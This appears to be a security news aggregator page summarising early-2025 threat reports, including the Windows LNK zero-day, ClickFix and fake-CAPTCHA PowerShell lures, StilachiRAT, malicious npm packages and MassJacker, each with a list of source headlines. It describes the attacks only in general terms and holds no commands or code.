Bill Mann@CyberInsider
//
Multiple state-backed hacking groups, including those from North Korea, Iran, Russia, and China, have been exploiting a Windows zero-day vulnerability since 2017 for data theft and cyber espionage. The vulnerability lies in malicious .LNK shortcut files rigged with commands to download malware, effectively hiding malicious payloads from users. Security researchers at Trend Micro's Zero Day Initiative discovered nearly 1,000 tampered .LNK files, though they believe the actual number of attacks could be much higher.
Microsoft has chosen not to address this vulnerability with a security update, classifying it as a low priority issue not meeting their bar for servicing. This decision comes despite the fact that the exploitation avenue has been used in an eight-year-long spying campaign, relying on hiding commands using megabytes of whitespace to bury the actual commands deep out of sight in the user interface. Dustin Childs of the Zero Day Initiative told *The Register* that while this is one of many bugs used by attackers, its unpatched status makes it a significant concern.
Recommended read:
References :
- The Hacker News: An unpatched security flaw impacting Microsoft Windows has been exploited by 11 state-sponsored groups from China, Iran, North Korea, and Russia as part of data theft, espionage, and financially motivated campaigns that date back to 2017.
- ZDI: Published Advisories: ZDI-25-148: (0Day) Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability
- The Register - Security: Microsoft isn't fixing 8-year-old shortcut exploit abused for spying
- securityaffairs.com: State-Sponsored Actors and Cybercrime Gangs Abuse Malicious .lnk Files for Espionage and Data Theft
- CyberInsider: Microsoft has acknowledged that its latest Windows update has unintentionally uninstalled the Copilot app from some Windows 11 devices.
- BleepingComputer: New Windows zero-day exploited by 11 state hacking groups since 2017
- The DefendOps Diaries: Exploiting Windows Zero-Day Vulnerabilities: The Role of State-Sponsored Hacking Groups
- securityonline.info: Hidden Threat: Zero-Day Windows Shortcut Exploited by Global APT Networks
- www.it-daily.net: Critical Windows security vulnerability discovered
- socradar.io: Windows Shortcut Zero-Day (ZDI-CAN-25373) Exploited by State-Backed Threat Actors Since 2017: Overview of Key Details
- Virus Bulletin: Trend Micro ZDI's Peter Girnus & Aliakbar Zahravi describe how researchers uncovered both state-sponsored and cybercriminal groups extensively exploiting ZDI-CAN-25373, a Windows .lnk file vulnerability that enables hidden command execution.
- Tech Monitor: Windows shortcut exploit used as zero-day in global cyber espionage campaigns
- www.ghacks.net: Windows has an 8-year-old security issue that is exploited and known by Microsoft for some time
- www.cybersecuritydive.com: A vulnerability that allows for malicious payloads to be delivered via Windows shortcut files has not yet been addressed by Microsoft and has been under active attack for eight years.
- www.techradar.com: An unpatched Windows zero-day flaw has been exploited by 11 nation-state attackers
- Security Risk Advisors: 🚩APT Groups Exploit Unpatched Windows Shortcut Vulnerability for Espionage and Data Theft
- hackread.com: 11 Nation-State Hackers Exploit Unpatched Windows Flaw Since 2017
- : Windows Shortcut Flaw Exploited by 11 State-Sponsored Groups
- Blog: Microsoft reluctant to patch Windows zero-day exploited by nation-state hackers
- Virus Bulletin: Trend Micro ZDI's Peter Girnus & Aliakbar Zahravi describe how researchers uncovered both state-sponsored and cybercriminal groups extensively exploiting ZDI-CAN-25373, a Windows .lnk file vulnerability that enables hidden command execution.
- Sam Bent: Windows Shortcut Zero-Day Used by Nation-States
- Jon Greig: Researchers Trend Micro's Zero Day Initiative said they have identified multiple campaigns from nation-state groups in North Korea, China and Russia exploiting an issue impacting .lnk files Microsoft said the report "does not meet the bar for immediate servicing"
- Threats | CyberScoop: Trend Micro researchers discovered and reported the eight-year-old defect to Microsoft six months ago. The company hasn’t made any commitments to patch or remediate the issue.
- Jon Greig: Researchers Trend Micro's Zero Day Initiative said they have identified multiple campaigns from nation-state groups in North Korea, China and Russia exploiting an issue impacting .lnk files Microsoft said the report "does not meet the bar for immediate servicing"
- www.trendmicro.com: ZDI-CAN-25373: Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns
- Logpoint: Windows Shell Link Vulnerability ZDI-CAN-25373: Detecting Hidden Commands
- SecureWorld News: Nation-State Hackers Exploit Windows Shortcut Zero-Day Vulnerability
- Information Security Buzz: Windows Shortcut Zero-Day Under Active Attack
- borncity.com: Windows shortcut exploit used by state hackers as a 0-day since 2017
- Help Net Security: APTs have been using zero-day Windows shortcut exploit for eight years (ZDI-CAN-25373)
- aboutdfir.com: Microsoft isn’t fixing 8-year-old shortcut exploit abused for spying An exploitation avenue found by Trend Micro in Windows has been used in an eight-year-long spying campaign, but there’s no sign of a fix from Microsoft, which apparently considers this a low priority.
- securityboulevard.com: Microsoft Won’t Fix This Bad Zero Day (Despite Wide Abuse)
- aboutdfir.com: Microsoft isn’t fixing 8-year-old shortcut exploit abused for spying An exploitation avenue found by Trend Micro in Windows has been used in an eight-year-long spying campaign, but there’s no sign of a fix from Microsoft, which apparently considers this a low priority.
Microsoft Threat@Microsoft Security Blog
//
An ongoing phishing campaign impersonating Booking.com is targeting hospitality employees with credential-stealing malware. Microsoft Threat Intelligence has identified the campaign, which began in December 2024 and is ongoing as of February 2025. Cybercriminals are sending malicious emails to employees likely to work with Booking.com, in North America, Oceania, South and Southeast Asia, and Europe, using a social engineering technique called ClickFix to deliver the malware. This campaign aims to conduct financial fraud and theft by compromising employee credentials.
The ClickFix technique involves fake error messages and prompts that instruct users to fix issues by copying and pasting commands, leading to malware downloads. The phishing emails vary in content, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, and account verification to induce clicks. The threat actor, tracked as Storm-1865, has evolved its tactics to bypass security measures.
Recommended read:
References :
- krebsonsecurity.com: Booking.com Phishers May Leave You With Reservations
- Source Asia: Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware
- The DefendOps Diaries: Understanding the ClickFix Phishing Threat to the Hospitality Industry
- The Hacker News: Microsoft Warns of ClickFix Phishing Campaign Targeting Hospitality Sector via Fake Booking[.]com Emails
- : ‘ClickFix’ Phishing Scam Impersonates Booking.com to Target Hospitality
- The Record: Cybercriminals are sending malicious emails to hospitality employees who are likely to work with Booking.com
- bsky.app: Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
- The Register - Security: That 'angry guest' email from Booking.com? It's a scam, not a 1-star review
- www.techradar.com: Microsoft warns about a new phishing campaign impersonating Booking.com
- TARNKAPPE.INFO: ClickFix-Phishing: Neue Kampagne richtet sich gegen die Hotellerie
- bsky.app: Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
- Virus Bulletin: Microsoft researchers identified a phishing campaign (Storm-1865) that uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft.
- BleepingComputer: Microsoft warns that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
- Email Security - Blog: "ClickFix" Phishing Impersonation Campaign Targets Hospitality Sector
- eSecurity Planet: Phishing Campaign Impersonates Booking.com, Plants Malware
- Security Risk Advisors: 🚩Microsoft Detects Ongoing Phishing Impersonation of Booking.com Using “ClickFix� to Deliver Credential-Stealing Malware
- Blog: Phishing campaign impersonates Booking.com, plants malware
- Davey Winder: Booking.com CAPTCHA attack impacts customers—but systems not breached, a spokesperson has said.
- www.computerworld.com: Description of the ClickFix phishing campaign targeting the hospitality industry via fake Booking.com emails.
- www.cysecurity.news: A phishing campaign impersonates Booking.com, targeting organizations in hospitality, using the ClickFix method to spread credential-stealing malware.
- www.cybersecurity-insiders.com: Malware Impersonating Booking.com Targets Hospitality Sector
- thecyberexpress.com: Microsoft Detects Ongoing Phishing Impersonation of Booking.com Using “ClickFix” to Deliver Credential-Stealing Malware
- securityonline.info: Booking.com Impersonated in Phishing Campaign Delivering Credential-Stealing Malware
- gbhackers.com: Microsoft Threat Intelligence has identified an ongoing phishing campaign that began in December 2024, targeting organizations in the hospitality industry by impersonating the online travel agency Booking.com. The campaign, tracked as Storm-1865, employs a sophisticated social engineering technique called ClickFix to deliver credential-stealing malware designed to conduct financial fraud and theft. This attack specifically targets
- Metacurity: The attackers are impersonating Booking.com to deliver credential-stealing malware.
- Talkback Resources: Storm-1865 Impersonates Booking.com in Phishing Scheme
- Blog: Storm-1865 leverages ‘ClickFix’ technique in new phishing campaign
@cyberalerts.io
//
The FBI has issued a warning about the rising trend of cybercriminals using fake file converter tools to distribute malware. These tools, often advertised as free online document converters, are designed to trick users into downloading malicious software onto their computers. While these tools may perform the advertised file conversion, they also secretly install malware that can lead to identity theft, ransomware attacks, and the compromise of sensitive data.
The threat actors exploit various file converter or downloader tools, enticing users with promises of converting files from one format to another, such as .doc to .pdf, or combining multiple files. The malicious code, disguised as a file conversion utility, can scrape uploaded files for personal identifying information, including social security numbers, banking information, and cryptocurrency wallet addresses. The FBI advises users to be cautious of such tools and report any instances of this scam to protect their assets.
The FBI Denver Field Office is warning that they are increasingly seeing scams involving free online document converter tools and encourages victims to report any instances of this scam. Malwarebytes has identified some of these suspect file converters, which include Imageconvertors.com, convertitoremp3.it, convertisseurs-pdf.com and convertscloud.com. The agency emphasized the importance of educating individuals about these threats to prevent them from falling victim to these scams.
Recommended read:
References :
- Talkback Resources: FBI warns of malware-laden websites posing as free file converters, leading to ransomware attacks and data theft.
- gbhackers.com: Beware! Malware Hidden in Free Word-to-PDF Converters
- www.bitdefender.com: Free file converter malware scam “rampant� claims FBI
- Malwarebytes: Warning over free online file converters that actually install malware
- bsky.app: Free file converter malware scam "rampant" claims FBI.
- bsky.app: @bushidotoken.net has dug up some IOCs for the FBI's recent warning about online file format converters being used to distribute malware
- Help Net Security: FBI: Free file converter sites and tools deliver malware
- www.techradar.com: Free online file converters could infect your PC with malware, FBI warns
- bsky.app: Free file converter malware scam "rampant" claims FBI.
- Security | TechRepublic: Scam Alert: FBI ‘Increasingly Seeing’ Malware Distributed In Document Converters
- securityaffairs.com: The FBI warns of a significant increase in scams involving free online document converters to infect users with malware. The FBI warns that threat actors use malicious online document converters to steal users’ sensitive information and infect their systems with malware.
- The DefendOps Diaries: FBI warns against fake file converters spreading malware and stealing data. Learn how to protect yourself from these cyber threats.
- PCMag UK security: PSA: Be Careful Around Free File Converters, They Might Contain Malware
- www.bleepingcomputer.com: FBI warnings are true—fake file converters do push malware
- www.techradar.com: FBI warns some web-based file management services are not as well-intentioned as they seem.
- www.csoonline.com: Improvements Microsoft has made to Office document security that disable macros and other embedded malware by default has forced criminals to up their innovation game, a security expert said Monday.
- www.itpro.com: Fake file converter tools are on the rise – here’s what you need to know
- Cyber Security News: The FBI Denver Field Office has warned sternly about the rising threat of malicious online file converter tools. These seemingly harmless services, often advertised as free tools to convert or merge files, are being weaponized by cybercriminals to install malware on users’ computers. This malware can have devastating consequences, including ransomware attacks and identity theft. […]
Microsoft Incident@Microsoft Security Blog
//
Microsoft's Incident Response team has uncovered a novel remote access trojan (RAT) named StilachiRAT, which employs sophisticated techniques to evade detection and steal sensitive data. Discovered in November 2024, StilachiRAT demonstrates advanced methods to remain undetected, persist in the targeted environment, and exfiltrate valuable information. The malware is capable of gathering system information, stealing credentials stored in browsers, targeting cryptocurrency wallets, and using command-and-control connectivity for remote execution.
The RAT scans for configuration data of 20 different cryptocurrency wallet extensions for the Google Chrome browser and extracts credentials from the browser, indicating its focus on cryptocurrency theft and credential compromise. It establishes communication with remote command-and-control (C2) servers to execute commands, manipulate registry settings, and clear logs, making it challenging to detect and remove. Microsoft advises users to download software from official sources, use web browsers with SmartScreen support, and enable Safe Links and Safe Attachments for Office 365 to prevent StilachiRAT infections.
Recommended read:
References :
- bsky.app: ​MicrosoftÂ
has discovered a new remote access trojan (RAT) that employs "sophisticated techniques" to avoid detection, ensure persistence, and extract sensitive information data.
- BleepingComputer: Microsoft: New RAT malware used for crypto theft, reconnaissance
- Microsoft Security Blog: StilachiRAT analysis: From system reconnaissance to cryptocurrency theft
- BleepingComputer: Microsoft has discovered a new remote access trojan (RAT) that employs "sophisticated techniques" to avoid detection, ensure persistence, and extract sensitive information data.
- hackread.com: StilachiRAT: Sophisticated malware targets crypto wallets & credentials. Undetected, it maps systems & steals data. Microsoft advises strong security measures.
- Virus Bulletin: Microsoft researchers uncovered a novel remote access trojan (RAT) named StilachiRAT that demonstrates sophisticated techniques to evade detection, persist in the target environment, and exfiltrate sensitive data.
- securityaffairs.com: New StilachiRAT uses sophisticated techniques to avoid detection
- The DefendOps Diaries: Understanding StilachiRAT: A New Cyber Threat Targeting Cryptocurrency
- CyberInsider: Microsoft Uncovers New Stealthy Malware ‘StilachiRAT’ Targeting User Data
- The Hacker News: Microsoft Warns of StilachiRAT: A Stealthy RAT Targeting Credentials and Crypto Wallets
- The Hacker News: Microsoft Warns of StilachiRAT: A Stealthy RAT Targeting Credentials and Crypto Wallets
- Tech Monitor: New remote access trojan ‘StilachiRAT’ identified
- Help Net Security: Stealthy StilachiRAT steals data, may enable lateral movement
- www.techradar.com: Microsoft warns of a devious new RAT malware which can avoid detection with apparent ease
- The Record: A previously unreported remote access trojan that Microsoft researchers dubbed StilachiRAT is designed to steal a wide range of data, including information about cryptocurrency wallet extensions for Google's Chrome browser.
- Blog: New ‘StilachiRAT’ found scurrying in crypto wallets
- BleepingComputer: Detailed technical analysis of the StilachiRAT malware and its operational capabilities.
- securityonline.info: Microsoft Uncovers Sophisticated StilachiRAT Malware
- Sophos X-Ops: Microsoft has discovered a new remote access trojan (RAT) dubbed StilachiRAT, which uses sophisticated techniques to avoid detection.
- Cyber Security News: Microsoft has recently issued a warning about a novel remote access trojan (RAT) known as StilachiRAT, which has been discovered to possess sophisticated capabilities for evading detection and stealing sensitive data. This malware was identified by Microsoft Incident Response researchers in November 2024 and is notable for its ability to target Remote Desktop Protocol (RDP) […] The post appeared first on .
lucija.valentic@reversinglabs.com (Lucija@Blog (Main)
//
A new malware campaign has been discovered targeting developers through malicious npm packages. Researchers at ReversingLabs identified two packages, ethers-provider2 and ethers-providerz, designed to inject reverse shells into locally installed instances of the popular 'ethers' library. This allows attackers to gain remote access to compromised systems. The attack cleverly hides its malicious payload, modifying legitimate files to ensure persistence even after the initial packages are removed.
This campaign showcases a sophisticated approach to software supply chain attacks. The malicious packages act as downloaders, patching the 'ethers' library with a reverse shell. Once 'ethers' is reinstalled, the modifications are reintroduced, granting attackers continued access. ReversingLabs detected the threat using their Spectra platform and have developed a YARA rule to identify compromised systems. While ethers-providerz has been removed, ethers-provider2 remains available, posing a substantial risk, especially if such tactics are deployed against more popular npm packages in the future.
Recommended read:
References :
- : Malicious npm Packages Deliver Sophisticated Reverse Shells
- Blog (Main): Malware found on npm infecting local package with reverse shell
- thehackernews.com: Malicious npm Package Modifies Local 'ethers' Library to Launch Reverse Shell Attacks
- hackread.com: New npm Malware Attack Infects Popular Ethereum Library with Backdoor
- www.bleepingcomputer.com: Two malicious packages were discovered on npm (Node package manager) that covertly patch legitimate, locally installed packages to inject a persistent reverse shell backdoor.
- The DefendOps Diaries: Explore a sophisticated npm attack revealing software supply chain vulnerabilities and the need for enhanced security measures.
- Datadog Security Labs: Introducing Supply-Chain Firewall: Protecting Developers from Malicious Open Source Packages
- www.csoonline.com: Malicious npm packages found to create a backdoor in legitimate code
- BleepingComputer: Infostealer campaign compromises 10 npm packages, targets devs
- www.scworld.com: reports on NPM related infostealer campaigns
Deeba Ahmed@hackread.com
//
A new wave of Android malware campaigns are exploiting Microsoft’s .NET MAUI framework to target users, particularly in India and China. Cybersecurity researchers at McAfee Labs have identified these malicious applications, which disguise themselves as legitimate services like banking and social media apps, to steal sensitive user information. These fake apps, collectively codenamed FakeApp, are not distributed through official channels like Google Play, but rather through bogus links sent via messaging apps and unofficial app stores. .NET MAUI, designed as a cross-platform development framework, allows these threats to conceal malicious code, making them difficult to detect by traditional antivirus solutions.
Researchers have found that the malware's core functionalities are written entirely in C# and stored as binary large objects, evading detection methods that typically analyze DEX files or native libraries. For instance, a fraudulent banking app impersonates IndusInd Bank, targeting Indian users by prompting them to enter personal and financial details, which are then sent to the attacker's command-and-control server. Another instance involves a fake social networking service app aimed at Chinese-speaking users, employing multi-stage dynamic loading to decrypt and execute its payload in separate stages, further complicating analysis and disrupting security tools.
Recommended read:
References :
- hackread.com: Hackers Are Using Microsoft’s .NET MAUI to Spread Android Malware
- securityaffairs.com: Android malware campaigns use .NET MAUI to evade detection
- The DefendOps Diaries: Understanding the Threat: How .NET MAUI is Changing Android Malware
- thehackernews.com: Hackers Use .NET MAUI to Target Indian and Chinese Users with Fake Banking, Social Apps
- www.infosecurity-magazine.com: New Android Malware Uses .NET MAUI to Evade Detection
- securityonline.info: New Android Malware Campaign Uses .NET MAUI to Evade Detection
- Security Risk Advisors: 🚩New Android Malware Campaign Exploits .NET MAUI Framework to Steal Sensitive Data
- MSSP feed for Latest: Threat actors exploited Microsoft's .NET MAUI cross-platform development framework to craft fake apps in new Android malware campaigns.
- Virus Bulletin: McAfee's Mobile Research Team discovered an Android malware campaign abusing .NET MAUI, a cross-platform development framework, to evade detection and remain active on devices for a long time.
- BleepingComputer: New Android malware campaigns use Microsoft's cross-platform framework .NET MAUI while disguising as legitimate services to evade detection.
- Security | TechRepublic: Android Malware Exploits a Microsoft-Related Security Blind Spot to Avoid Detection
Andres Ramos@Arctic Wolf
//
A resurgence of a fake CAPTCHA malware campaign has been observed, with threat actors compromising widely used websites across various industries. They are embedding a fake CAPTCHA challenge that redirects victims to a site triggering PowerShell code execution. This campaign exploits social engineering tactics and fake software downloads to deceive users into executing malicious scripts.
This tactic is also utilized with fake captchas which resemble legitimate sites. When users attempt to pass the captcha, they are prompted to execute code that has been copied to their clipboard. The OBSCURE#BAT malware campaign is a major cybersecurity threat to both individuals and organizations, primarily due to its ability to compromise sensitive data through advanced evasion techniques, including API hooking. This allows the malware to hide files and registry entries, making detection difficult.
Recommended read:
References :
- Arctic Wolf: Widespread Fake CAPTCHA Campaign Delivering Malware
- hackread.com: New OBSCURE#BAT Malware Targets Users with Fake Captchas
- Security Risk Advisors: 🚩 Fake CAPTCHA Malware Campaign Resurges With Multi-Stage PowerShell Infostealers
- SpiderLabs Blog: Resurgence of a Fake Captcha Malware Campaign
- www.zdnet.com: That weird CAPTCHA could be a malware trap - here's how to protect yourself
- Seceon Inc: Beware of Fake CAPTCHA Scams: How Cybercriminals Are Hijacking Your Clipboard to Steal Data
- www.cysecurity.news: Fake CAPTCHA Scams Trick Windows Users into Downloading Malware
- : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
- Broadcom Software Blogs: In a recent surge of sophisticated cyber threats, attackers are exploiting fake CAPTCHA verifications to hijack users’ clipboards, leading to the installation of information-stealing malware.
- Security Risk Advisors: ClearFake injects JavaScript to show fake CAPTCHAs on compromised sites, tricking users into running PowerShell for Lumma/Vidar malware.
- www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
- gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
- Sucuri Blog: Sucuri Blog: Fake Cloudflare Verification Results in LummaStealer Trojan Infections
- securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
Field Effect@Blog
//
A sophisticated cyber threat is rapidly evolving, exploiting user familiarity with CAPTCHAs to distribute malware through social engineering tactics. The ClearFake malicious JavaScript framework now utilizes 'ClickFix' techniques to trick users into executing malicious PowerShell commands, often disguised as fake reCAPTCHA or Cloudflare Turnstile verifications. This framework injects a fraudulent CAPTCHA on compromised websites, enticing visitors to unknowingly copy and paste malicious commands that lead to malware installation.
https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/
This 'ClickFix' attack redirects victims to malicious webpages delivering fake CAPTCHA verifications, ultimately deploying information-stealing malware such as Lumma Stealer and Vidar Stealer. Over 100 car dealerships have already been impacted by a supply-chain attack involving injected malicious code, and Microsoft has identified an ongoing Storm-1865 phishing campaign targeting the hospitality industry using the same 'ClickFix' technique. Security experts advise users to exercise extreme caution with unsolicited instructions, especially those prompting system commands.
Recommended read:
References :
- Blog: Microsoft has identified an ongoing Storm-1865 phishing campaign targeting the hospitality industry by masquerading as Booking.com communications. Initiated in December 2024, this campaign leverages a social engineering tactic known as ClickFix to disseminate credential-stealing malware.
- Malware ? Graham Cluley: A security researcher has discovered that the websites of over 100 car dealerships have been compromised in a supply-chain attack that attempted to infect the PCs of internet visitors.
- www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
- : Attackers are exploiting user familiarity with CAPTCHAs to distribute the Lumma Stealer RAT via malicious PowerShell commands, according to HP
- gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
- securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
- www.bleepingcomputer.com: Steam pulls game demo infecting Windows with info-stealing malware
do son@securityonline.info
//
Cybercriminals are actively exploiting the Signal messaging application to distribute an information-stealing Remote Access Trojan (RAT), raising serious privacy concerns. According to a recently published report, a cybercriminal group identified as UNC-200 is behind the campaign, which involves targeting high-value individuals within Ukraine's defense sector. The Computer Emergency Response Team of Ukraine (CERT-UA) has issued warnings about this campaign, which utilizes the Dark Crystal RAT (aka DCRat) to compromise systems.
This malicious activity involves distributing messages via Signal that contain what appears to be meeting minutes. These messages are sent from compromised accounts to enhance credibility, enticing unsuspecting users to download malicious archive files. The archives contain a decoy PDF and an executable that deploys the DCRat malware, giving attackers remote access and control, stealing valuable information and executing arbitrary commands. CERT-UA attributes this activity to UAC-0200, active since summer 2024, who noted that the use of popular messengers increases the attack surface, including due to the creation of uncontrolled information exchange channels.
Recommended read:
References :
- cyberinsider.com: Ukraine Warns Signal Used for Spreading RATs on High-Value Targets
- securityonline.info: CERT-UA Alert: DarkCrystal RAT Deployed via Signal in Ukraine
- SOC Prime Blog: Detect UAC-0200 Attacks Using DarkCrystal RAT
- The DefendOps Diaries: Russian Cyber Espionage Targets Ukrainian Military via Signal
- BleepingComputer: Ukrainian military targeted in new Signal spear-phishing attacks
- BleepingComputer: Ukraine's Computer Emergency Response Team (CERT-UA) is warning about highly targeted attacks employing compromised Signal accounts to send malware to employees of defense industry firms and members of the country's army forces.
- securityaffairs.com: CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT
- The Hacker News: CERT-UA Warns: Dark Crystal RAT Targets Ukrainian Defense via Malicious Signal Messages
- BleepingComputer: Ukraine's Computer Emergency Response Team (CERT-UA) is warning about highly targeted attacks employing compromised Signal accounts to send malware to employees of defense industry firms and members of the country's army forces.
- Sam Bent: Report: Cybercriminals Leverage Signal App to Deploy Info-Stealing RAT, Raising Privacy Concerns
- bsky.app: CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT
- www.scworld.com: Attackers, tracked under the UAC-0200 threat cluster, leveraged the Signal messaging app to deliver messages purportedly containing minutes of the meeting reports as archive files.
@The DefendOps Diaries
//
Valve has recently removed the video game "Sniper: Phantom's Resolution" from Steam after users discovered that its free demo contained infostealer malware. This marks the second instance in recent months where Steam has been exploited to distribute malicious software, raising concerns about the platform's security measures. The incident came to light when users on Reddit analyzed the demo and reported their findings.
The malware in "Sniper: Phantom's Resolution" follows a similar incident from last month involving a game called "PirateFi," which also turned out to be a malware plant designed to steal player passwords. These incidents emphasize the need for Steam to enhance its vetting process for game demos. Users are advised to exercise caution when downloading and installing content from the platform, ensuring they have up-to-date antivirus software and are vigilant about potential threats.
Recommended read:
References :
- infosec.exchange: NEW: Valve removed a video game from Steam after users reported that its free demo was actually an infostealer malware. Very similar thing happened last month with another video game laced with malware.
- techcrunch.com: Valve removes video game demo suspected of being malware
- The DefendOps Diaries: Steam's Security Challenge: Malware in Game Demos
- CyberInsider: Steam Removes “Sniper: Phantom’s Resolution†After Users Find Malware in Demo
- PCMag UK security: Steam Used (Again) To Trick Gamers Into Installing Malware
- www.bleepingcomputer.com: Steam pulls game demo infecting Windows with info-stealing malware
- bsky.app: Valve has removed a game titled 'Sniper: Phantom's Resolution' from the Steam store following multiple user reports that indicated its demo installer actually infected their systems with information stealing malware.
- bsky.app: Steam has removed the demo of an upcoming game named "Sniper: Phantom's Resolution" for installing malware on user devices.
- BleepingComputer: Valve has removed a game titled 'Sniper: Phantom's Resolution' from the Steam store following multiple user reports that indicated its demo installer actually infected their systems with information stealing malware.
- bsky.app: Valve removes a game titled 'Sniper: Phantom's Resolution' from the Steam store following multiple user reports that indicated its demo installer actually infected their systems with information stealing malware.
@www.infosecurity-magazine.com
//
Attackers are exploiting user familiarity with CAPTCHAs to distribute the Lumma Stealer RAT (Remote Access Trojan) via malicious PowerShell commands, according to recent findings. These campaigns involve tricking users into running PowerShell commands that ultimately install the Lumma Stealer. Attackers direct potential victims to attacker-controlled sites and prompt them to complete fake authentication challenges. These challenges often involve directing potential victims to malicious websites where they are prompted to complete verification steps, but instead of a CAPTCHA, it instructs them to press Windows + R and run a PowerShell command—under the false pretense of running “Windows Defender.”
These attacks leverage weaponized CAPTCHAs, with users being directed to malicious websites where they are prompted to complete verification steps. Upon completing these steps, users inadvertently copy and run PowerShell scripts that download and install malware, such as the Lumma Stealer. This allows the attackers to steal sensitive data like cryptocurrency wallets. The exploitation involves fake Cloudflare verification prompts, which lead users to execute malicious PowerShell commands to install the LummaStealer Trojan through infected WordPress sites, posing a significant threat.
Recommended read:
References :
- gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
- securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
- : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
- www.cisecurity.org: Active Lumma Stealer Campaign Impacting U.S. SLTTs
Microsoft Threat@Microsoft Security Blog
//
The U.S. Department of Justice has indicted 12 Chinese individuals for over a decade of global hacking intrusions, including a breach of the U.S. Treasury last year. The individuals include eight staffers for the contractor i-Soon, two officials at China’s Ministry of Public Security, and two other alleged hackers belonging to the APT27 group, also known as Silk Typhoon. The group is accused of targeting U.S. state and federal agencies, foreign ministries across Asia, Chinese dissidents, and U.S.-based media outlets critical of the Chinese government.
Microsoft Threat Intelligence has detected a new variant of XCSSET, a macOS malware targeting Xcode projects, since 2022. This variant features enhanced obfuscation, updated persistence mechanisms, and new infection strategies. It steals and exfiltrates files and system/user information, including digital wallet data and notes. The malware's modular approach and encoded payloads make detection and removal challenging, even allowing it to remain fileless.
Recommended read:
Pierluigi Paganini@Security Affairs
//
Cybersecurity researchers at CyberArk have uncovered a new cryptojacking malware campaign called MassJacker. This sophisticated malware targets users who download pirated software, particularly from websites known for distributing malware, such as pesktop[.]com. MassJacker operates as a clipboard hijacker, monitoring the Windows clipboard for copied cryptocurrency wallet addresses.
When a user copies an address, the malware stealthily replaces it with one controlled by the attackers, resulting in the victim unknowingly sending cryptocurrency to the malicious actors instead of the intended recipient. The investigation revealed that MassJacker has been associated with over 750,000 unique cryptocurrency addresses, with one wallet holding over $300,000.
Recommended read:
|
|